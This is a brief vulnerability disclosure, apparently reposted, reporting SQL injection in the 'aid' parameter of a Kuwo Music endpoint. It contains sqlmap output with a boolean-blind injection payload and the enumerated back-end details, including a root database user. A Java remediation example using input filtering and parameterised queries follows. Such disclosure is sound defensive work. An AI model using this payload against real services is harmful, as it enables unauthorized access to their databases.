SQL Injection Vulnerability in the Kuwo Music (酷我音乐) App
程序员文章站
2022-06-26 10:33:29
*****300&type=guid&_=1478935789&*****
Injection point: aid
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: aid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: aid=2078300) AND 2825=2825 AND (5697=5697&type=guid&_=1478935789pid=5901124&uid=21259663
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.2
current user: 'root@192.168.298.15'
current database: 'MLOG'
For verification only. Please fix as soon as possible!
Remediation:
Parameter filtering
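One way to apply this filtering to the aid parameter on a JSP/MySQL back end, shown as an added example that is not part of the original report or the vendor's code: the value is accepted only if it is a plain decimal integer, and is then bound as a query parameter instead of being concatenated into the SQL text. The class name, table name, column names and the parenthesised WHERE shape are assumptions made for illustration.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class AidLookup {
    // Hypothetical table and column names; the real schema is not shown in the report.
    private static final String QUERY = "SELECT name FROM album WHERE (aid = ?)";

    /** Filter: accept only 1-18 ASCII digits, so the value always fits in a long. */
    static long parseAid(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,18}")) {
            throw new IllegalArgumentException("aid must be a decimal integer");
        }
        return Long.parseLong(raw);
    }

    /** Bind the validated value as a parameter; it is never spliced into the SQL text. */
    static String findName(Connection db, String rawAid) throws SQLException {
        try (PreparedStatement ps = db.prepareStatement(QUERY)) {
            ps.setLong(1, parseAid(rawAid));
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    public static void main(String[] args) {
        // First value is a plain id; second is the aid value from the sqlmap payload above.
        String[] samples = {"2078300", "2078300) AND 2825=2825 AND (5697=5697"};
        for (String s : samples) {
            try {
                System.out.println("accepted: " + parseAid(s));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + s);
            }
        }
    }
}
```

Since sqlmap reported the current user as root, running the application under a database account limited to the tables it needs would also reduce what an injection of this kind can reach.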